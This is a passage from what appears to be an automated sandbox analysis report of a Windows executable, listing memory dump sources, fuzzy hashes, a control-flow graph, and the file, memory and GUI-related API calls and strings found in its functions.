                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 337159654cfbe62c379e17175d0845e6585348c255179325ee0b5cd5b807ab09
                  • Instruction ID: a95e8eacae181bb4df3a92d106ef41a1663d55049b70ab15820d91be8aec39a8
                  • Opcode Fuzzy Hash: 337159654cfbe62c379e17175d0845e6585348c255179325ee0b5cd5b807ab09
                  • Instruction Fuzzy Hash: CDA1C132A18AD4CAE711CF7E80412FCBBB4FB59349F155335EE8532A65DB386586DB00
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
                  • Instruction ID: 33bdbc1db3c5c766863085d8333cf10f29ebcbcc01a96b8579a7a2e77e7bcbd5
                  • Opcode Fuzzy Hash: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
                  • Instruction Fuzzy Hash: 1851EBA66244B187DA608F2ED4816BC3BA1E745743FD484B6D699C2F51D63DC10BEF20
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d9fb49b62c65e024d0e2afc8e88561ce0de7a38d0c74c8b5e211e9945fc1fa4b
                  • Instruction ID: 9795affd6bffeaa1a2315bdec7dd52ad60977c0e9d87f9da0c0d7a14909e5922
                  • Opcode Fuzzy Hash: d9fb49b62c65e024d0e2afc8e88561ce0de7a38d0c74c8b5e211e9945fc1fa4b
                  • Instruction Fuzzy Hash: 034128B2B201F95FEA98C6665824F3D7F51D3D2742789A606FF8027D48C13C9612DBA0
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a19aad8a692dbb4a87b1410e9d490f89fc902783b6ee00e8b7df0b35a0b99771
                  • Instruction ID: b9f4a3d4b159512643348e3f53e76e243dc8652d9b00aabe7434c3c31103a47a
                  • Opcode Fuzzy Hash: a19aad8a692dbb4a87b1410e9d490f89fc902783b6ee00e8b7df0b35a0b99771
                  • Instruction Fuzzy Hash: C751E536610A8582DB54CF2AE554BAE6761FB8DF88F49A132DF4E03B28DF39D0548B00
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a5ad9cfef8fb6cdb00968b64ec9f9d2b4eb2d1419fd3eb04d3a27f44c570c0d1
                  • Instruction ID: 14d10db7644ba6e0a48e05173c62583efaf10d51108459f9b3d05eef1953c7b2
                  • Opcode Fuzzy Hash: a5ad9cfef8fb6cdb00968b64ec9f9d2b4eb2d1419fd3eb04d3a27f44c570c0d1
                  • Instruction Fuzzy Hash: 8D413421E0D25A46E9318D23D08017EA655EFEABC0F5DD772ED8C676D4EF38E48A8704
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d1822a51eddc2b1b11f08983a1d5ab9f69a5efd01c1037a88392c8b7f74b1ded
                  • Instruction ID: 0f439beae5706f2c19d5a8f6013b33966681548e7723d7ae90e7f25d4f9f5b9d
                  • Opcode Fuzzy Hash: d1822a51eddc2b1b11f08983a1d5ab9f69a5efd01c1037a88392c8b7f74b1ded
                  • Instruction Fuzzy Hash: CE0128617006A287DB28CA66C4F057933A0F3D9B82B91213FDF4D8B644EE3CA665C720

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 2572 7ff69dce3050-7ff69dce3061 2573 7ff69dce3063 2572->2573 2574 7ff69dce306a-7ff69dce307c call 7ff69dce2f20 2572->2574 2573->2574 2577 7ff69dce307e-7ff69dce3089 2574->2577 2578 7ff69dce308a-7ff69dce30a2 ftell 2574->2578 2579 7ff69dce3163-7ff69dce3166 fclose 2578->2579 2580 7ff69dce30a8-7ff69dce30bb fseek 2578->2580 2581 7ff69dce316c 2579->2581 2580->2579 2582 7ff69dce30c1-7ff69dce30d0 ftell 2580->2582 2583 7ff69dce316e-7ff69dce3183 2581->2583 2582->2579 2584 7ff69dce30d6-7ff69dce30e6 fseek 2582->2584 2584->2579 2585 7ff69dce30e8-7ff69dce30ec 2584->2585 2585->2579 2586 7ff69dce30ee-7ff69dce30f8 2585->2586 2587 7ff69dce3100-7ff69dce310f malloc 2586->2587 2588 7ff69dce30fa 2586->2588 2587->2579 2589 7ff69dce3111-7ff69dce312b fread 2587->2589 2588->2587 2590 7ff69dce3150-7ff69dce3159 fclose 2589->2590 2591 7ff69dce312d-7ff69dce313d fclose 2589->2591 2592 7ff69dce315e-7ff69dce3161 2590->2592 2593 7ff69dce315b 2590->2593 2594 7ff69dce3145-7ff69dce314e free 2591->2594 2595 7ff69dce313f 2591->2595 2592->2583 2593->2592 2594->2581 2595->2594
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: fclose$fseekftell$freadfreemalloc
                  • String ID:
                  • API String ID: 1549146309-0
                  • Opcode ID: 8f4ad808eefabd7f849b8c6cecd0f2031373ecdfddbfddee00826a90e0b1bee3
                  • Instruction ID: 61678827095886df82eab89ae93fcddbcd45d50a394f3f590dc8b7c082bbfaa3
                  • Opcode Fuzzy Hash: 8f4ad808eefabd7f849b8c6cecd0f2031373ecdfddbfddee00826a90e0b1bee3
                  • Instruction Fuzzy Hash: 50318060B08642C1EA748B56A94523962A4FF45FD5F0862B9DD9EC37E4FE3CF8074390
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: memmove$memcmp
                  • String ID: $ $##Background
                  • API String ID: 845337883-670043462
                  • Opcode ID: 93f4ad55297f18cab66897378871b483fc16f6ad06b91759777d162fa0c9eb9b
                  • Instruction ID: 31d45783dc00aaf84b6fc76f7570377499fcb3a12273e4dee136a7b7b9051647
                  • Opcode Fuzzy Hash: 93f4ad55297f18cab66897378871b483fc16f6ad06b91759777d162fa0c9eb9b
                  • Instruction Fuzzy Hash: 75B1CE72B04A4287DB24CF19D44476D77A5FB84BC4F06A23ADB8987781EF38E889C740
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: _invalid_parameter_noinfo_noreturn$memmove$?uncaught_exceptions@std@@Concurrency::cancel_current_taskD@std@@@std@@Osfx@?$basic_ostream@U?$char_traits@malloc
                  • String ID:
                  • API String ID: 4241033127-0
                  • Opcode ID: f2517795b2b689b49bc800c2c93248c90c7633444fc8ed0f130adc92bf444e98
                  • Instruction ID: 5c307777cdc476501c4661f1a547c1064ecd13df5c47c731fadad405095ddfa6
                  • Opcode Fuzzy Hash: f2517795b2b689b49bc800c2c93248c90c7633444fc8ed0f130adc92bf444e98
                  • Instruction Fuzzy Hash: D451F762B49745C1EE289B26E840378A2A5EB45FB5F144771DABD877D0EF3CE4838340
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: memmove
                  • String ID: <NULL>$[focus] FocusWindow("%s", UnlessBelowModal): prevented by "%s".$[focus] SetNavWindow("%s")$[popup] ClosePopupsOverWindow("%s")
                  • API String ID: 2162964266-3417935506
                  • Opcode ID: 1d6e818e2bc5564d26da3eb178b209d5f21fac3db4005242ee915ea67d98fc86
                  • Instruction ID: 3ce3bedec7b8b2fdc4ce312ef92f576f29635b362c9c5ea876aa143b09c81f72
                  • Opcode Fuzzy Hash: 1d6e818e2bc5564d26da3eb178b209d5f21fac3db4005242ee915ea67d98fc86
                  • Instruction Fuzzy Hash: 5BE1D2A2A09BD2C5EB358F15D4466F867BDFB40BC8F054576CA8D87B94EF38E9428310
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: ceilf$cosfsinf
                  • String ID:
                  • API String ID: 125261001-0
                  • Opcode ID: 32bfb191c3948eaa3645c8aa4b69d698d7bb7f47e35243ca32e243e3aa410ec7
                  • Instruction ID: d45c041fc49d0716e7191f3caa3eeeebd1ea975f65a7f4414075114add88794f
                  • Opcode Fuzzy Hash: 32bfb191c3948eaa3645c8aa4b69d698d7bb7f47e35243ca32e243e3aa410ec7
                  • Instruction Fuzzy Hash: E4B1FD32D2868585D232873AD5416B9B350FF9D385F18A732E9C9B3665FF2CB4D98B00
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                  • String ID:
                  • API String ID: 2016347663-0
                  • Opcode ID: 774744eb45e0530b27bbaa6349c98f5fca3929f68fd74816389981fc05dec560
                  • Instruction ID: 5c3c669e8eea20d1301f53fd3f35335678d6d6d7f266393ff101e473ab750e4f
                  • Opcode Fuzzy Hash: 774744eb45e0530b27bbaa6349c98f5fca3929f68fd74816389981fc05dec560
                  • Instruction Fuzzy Hash: AA51F432A08B82D2EA209F25D94427D2374FB14B94F144636DFEC57782EF38E19AC341
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000000,00007FF69DCE3076), ref: 00007FF69DCE2F5B
                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000000,00007FF69DCE3076), ref: 00007FF69DCE2F7D
                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF69DCE3076), ref: 00007FF69DCE2FB3
                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000000,00007FF69DCE3076), ref: 00007FF69DCE2FD5
                  • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000000,00007FF69DCE3076), ref: 00007FF69DCE2FF9
                  • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00000000,00007FF69DCE3076), ref: 00007FF69DCE3005
                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF69DCE3076), ref: 00007FF69DCE3028
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$_wfopenfreemalloc
                  • String ID:
                  • API String ID: 2585890673-0
                  • Opcode ID: 9ffd282e1625e97faaf7f05b419da84b74c6dc653c0c63553d245c0b21b3cfb0
                  • Instruction ID: e08189fc0ab2307a7096b4a8ae20b09095dcb824ece155e8a4db3aae1c5ed196
                  • Opcode Fuzzy Hash: 9ffd282e1625e97faaf7f05b419da84b74c6dc653c0c63553d245c0b21b3cfb0
                  • Instruction Fuzzy Hash: 6D319231608B8286E7349F56A510139F6A5FF88BD4F084339DB9E87BA4EF3CD0068740
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: ContextWindow$CandidateCompositionRelease
                  • String ID: $@
                  • API String ID: 3969737024-1077428164
                  • Opcode ID: da45abd6725e7cdc7fb7c868a2eccafa2f206a88efe0a08d9a0cd370891504e9
                  • Instruction ID: e8da1a70668b5cd9723c232643cebdca2f38e90959c940a18ff3b1d48387c51b
                  • Opcode Fuzzy Hash: da45abd6725e7cdc7fb7c868a2eccafa2f206a88efe0a08d9a0cd370891504e9
                  • Instruction Fuzzy Hash: EC210C729187818AE735CF11E64426AB3A1FB89B88F145275DBCD46B18EF3CE545CF00
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: freemalloc$memmove
                  • String ID:
                  • API String ID: 3069178222-0
                  • Opcode ID: d4e4c406e3c6af694a7c936f6015adb368cf1bf02645b35bd3c9e2f00129d108
                  • Instruction ID: a8c476b148b5d2ffe930f6077a72bfa64104434548e0613048598c04ff49dd97
                  • Opcode Fuzzy Hash: d4e4c406e3c6af694a7c936f6015adb368cf1bf02645b35bd3c9e2f00129d108
                  • Instruction Fuzzy Hash: 03912B32A05B8186EB65CF25E54027C77A4FB98B84F15A275CF8D93761EF38E49AC340
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: memset$cosfmalloc
                  • String ID:
                  • API String ID: 2754591348-0
                  • Opcode ID: 5a539ee4e01d4d02e85f03c484729c64c70950b52ecd5abc66e71e8ffdd940fe
                  • Instruction ID: a129ba8028c06ac7157df087838b9e7d29795bddc3ae7cf9f3a8b5db922860f4
                  • Opcode Fuzzy Hash: 5a539ee4e01d4d02e85f03c484729c64c70950b52ecd5abc66e71e8ffdd940fe
                  • Instruction Fuzzy Hash: 5762BEB2615BC1AAD31CDF25EA4429AB7A8F745B11FA95329C3B403290DF74B1B0CB0D
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: cosfsinf
                  • String ID:
                  • API String ID: 3160392742-0
                  • Opcode ID: fcb9bc87cdbf3f8ab746cfe251ff8f7ad8188349da32386ff82af752e339a489
                  • Instruction ID: b533db4f1983e5c572d6a38b3843883fe57e2f04376f42e3d14f1d22878cacc0
                  • Opcode Fuzzy Hash: fcb9bc87cdbf3f8ab746cfe251ff8f7ad8188349da32386ff82af752e339a489
                  • Instruction Fuzzy Hash: CF71A311D28FC949E2239B3655422B5E354AFBB2C5F19E733F94A71A72FF2920D78600
                  APIs
                  • memmove.VCRUNTIME140(?,00000000,?,?,0000000100000000,00007FF69DCDEE22,?,?,?,?,00000000,00007FF69DCD912D), ref: 00007FF69DCDEF9E
                  • memmove.VCRUNTIME140(?,00000000,?,?,0000000100000000,00007FF69DCDEE22,?,?,?,?,00000000,00007FF69DCD912D), ref: 00007FF69DCDEFAC
                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,?,0000000100000000,00007FF69DCDEE22,?,?,?,?,00000000,00007FF69DCD912D), ref: 00007FF69DCDEFE5
                  • memmove.VCRUNTIME140(?,?,0000000100000000,00007FF69DCDEE22,?,?,?,?,00000000,00007FF69DCD912D), ref: 00007FF69DCDEFEF
                  • memmove.VCRUNTIME140(?,?,0000000100000000,00007FF69DCDEE22,?,?,?,?,00000000,00007FF69DCD912D), ref: 00007FF69DCDEFFD
                  • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF69DCDF02F
                  Memory Dump Source
                  • Source File: 00000000.00000002.3336466440.00007FF69DCD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF69DCD0000, based on PE: true
                  • Associated: 00000000.00000002.3336443018.00007FF69DCD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336521960.00007FF69DD20000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336548956.00007FF69DD30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD31000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3336596677.00007FF69DD36000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff69dcd0000_4sTTCruY06.jbxd
                  Similarity
                  • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                  • String ID:
                  • API String ID: 2016347663-0
                  • Opcode ID: a58a762193a29a1bcbdefa921f85e2ef380445f1a8a8234dad814cae80f426f3
                  • Instruction ID: c693b43e9bf0d37bef66db831b27ed486b538144281c49e646b864a969fd6d0a
                  • Opcode Fuzzy Hash: a58a762193a29a1bcbdefa921f85e2ef380445f1a8a8234dad814cae80f426f3
                  • Instruction Fuzzy Hash: 9E41C662B08781C4EE349B16A9043A9A269EB04FD4F544672EFED477C5EE3CE1468304
                  APIs
                    • Part of subcall function 00007FF69DD02450: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCE13E2), ref: 00007FF69DD0247D
                    • Part of subcall function 00007FF69DD02450: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCE13E2), ref: 00007FF69DD024A6
                    • Part of subcall function 00007FF69DD02450: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCE13E2), ref: 00007FF69DD024CF
                    • Part of subcall function 00007FF69DD02450: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCE13E2), ref: 00007FF69DD02504
                    • Part of subcall function 00007FF69DD02450: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCE13E2), ref: 00007FF69DD0252D
                    • Part of subcall function 00007FF69DD02450: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF69DCE13E2), ref: 00007FF69DD02559
